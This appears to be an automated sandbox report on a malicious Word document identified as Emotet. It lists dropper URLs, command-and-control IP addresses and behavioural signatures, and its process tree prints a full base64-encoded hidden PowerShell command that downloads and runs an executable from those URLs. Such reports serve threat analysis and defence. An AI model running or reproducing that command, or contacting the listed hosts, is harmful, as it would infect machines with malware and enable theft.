Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    20-12-2019 08:40

General

  • Target

    e433076a8225ccf66fd78a74aaedac45aeff8861f3b00a6b35a8d80695dd912e

  • Sample

    191220-r186jp4kqs

  • SHA256

    e433076a8225ccf66fd78a74aaedac45aeff8861f3b00a6b35a8d80695dd912e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zaferaniyehcenter.com/wp-admin/d3k2c/

exe.dropper

http://newsite.modernformslights.com/wp-content/gj18fr/

exe.dropper

http://dunhuangcaihui.com/feed/wiytu/

exe.dropper

http://blog.kpourkarite.com/et0a/ZnG6LPQDOd/

exe.dropper

https://hellothuoctot.com/wp-content/dw7e9/

Extracted

Family

emotet

C2

24.105.202.216:443

24.94.237.248:80

76.164.99.46:80

108.61.99.179:8080

165.227.156.155:443

159.69.89.130:8080

167.99.105.223:7080

87.230.19.21:8080

91.73.197.90:80

210.6.85.121:80

47.156.70.145:80

197.254.221.174:80

58.171.42.66:8080

66.34.201.20:7080

2.38.99.79:80

95.128.43.213:8080

190.12.119.180:443

67.225.179.64:8080

165.228.24.197:80

121.88.5.176:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e433076a8225ccf66fd78a74aaedac45aeff8861f3b00a6b35a8d80695dd912e.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4876
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABGAHcAdQBvAHEAZwBpAHIAaQBhAD0AJwBWAGgAdQBzAHQAZgBlAGMAdwAnADsAJABWAHAAZgBhAGkAeAB2AHcAZwBrAHYAdwBsACAAPQAgACcANQA3ACcAOwAkAEUAawB6AHEAdgBrAHQAeAB5AGgAcgBvAD0AJwBRAHMAbgB4AHgAYQBjAHEAJwA7ACQARgBwAGoAdAB0AHcAawBoAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFYAcABmAGEAaQB4AHYAdwBnAGsAdgB3AGwAKwAnAC4AZQB4AGUAJwA7ACQATABzAGMAcQBnAHMAbwBlAHkAYwBqAD0AJwBSAHcAeABoAGkAaABvAHEAZwAnADsAJABBAGwAawBnAGkAbwBzAHkAbQB1AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBCAEMAbABpAGUAbgB0ADsAJABXAGIAZgB4AG4AcABwAHoAcABlAGYAPQAnAGgAdAB0AHAAOgAvAC8AegBhAGYAZQByAGEAbgBpAHkAZQBoAGMAZQBuAHQAZQByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkADMAawAyAGMALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcAcwBpAHQAZQAuAG0AbwBkAGUAcgBuAGYAbwByAG0AcwBsAGkAZwBoAHQAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGcAagAxADgAZgByAC8AKgBoAHQAdABwADoALwAvAGQAdQBuAGgAdQBhAG4AZwBjAGEAaQBoAHUAaQAuAGMAbwBtAC8AZgBlAGUAZAAvAHcAaQB5AHQAdQAvACoAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AawBwAG8AdQByAGsAYQByAGkAdABlAC4AYwBvAG0ALwBlAHQAMABhAC8AWgBuAEcANgBMAFAAUQBEAE8AZAAvACoAaAB0AHQAcABzADoALwAvAGgAZQBsAGwAbwB0AGgAdQBvAGMAdABvAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBkAHcANwBlADkALwAnAC4AIgBzAHAAYABMAEkAdAAiACgAJwAqACcAKQA7ACQATwBtAHAAegBlAHgAcABvAGwAawBmAD0AJwBDAHIAZwBzAG0AcABsAHMAawAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBkAHkAbQBnAHkAYQBjAGYAdgAgAGkAbgAgACQAVwBiAGYAeABuAHAAcAB6AHAAZQBmACkAewB0AHIAeQB7ACQAQQBsAGsAZwBpAG8AcwB5AG0AdQAuACIAZABgAE8AYABXAE4AYABsAE8AYQBkAEYASQBMAEUAIgAoACQATQBkAHkAbQBnAHkAYQBjAGYAdgAsACAAJABGAHAAagB0AHQAdwBrAGgAcgApADsAJABBAHoAdAB1AGkAbAB4AGUAbgBtAGMAdQA9ACcAQQBiAG0AdgB1AHcAbQB0AHAAZgByACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARgBwAGoAdAB0AHcAawBoAHIAKQAuACIAbABlAG4AYABnAHQASAAiACAALQBnAGUAIAAyADAAOAA5ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAFQAIgAoACQARgBwAGoAdAB0AHcAawBoAHIAKQA7ACQAUgB0AHgAZQBiAHQAeQBlAD0AJwBGAGEAbQBhAHAAdgB6AHcAZABkAG0AbwAnADsAYgByAGUAYQBrADsAJABQAG8AaQBoAGoAbgBkAGgAcAB1AG4AdABvAD0AJwBKAHEAdgB3AHIAcQB1AGsAbQBkAHQAZgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHIAZAB1AGEAbwBtAGsAcgB2AHEAcgB4AD0AJwBNAHYAaABiAGUAdQBtAHIAcgBoAGcAdQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Users\Admin\57.exe
      "C:\Users\Admin\57.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4560
      • C:\Users\Admin\57.exe
        --38358dac
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        • Executes dropped EXE
        PID:4580

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4560-8-0x00000000022B0000-0x00000000022C7000-memory.dmp

    Filesize

    92KB

  • memory/4580-11-0x0000000000680000-0x0000000000697000-memory.dmp

    Filesize

    92KB

  • memory/4876-2-0x000002722E70E000-0x000002722E711000-memory.dmp

    Filesize

    12KB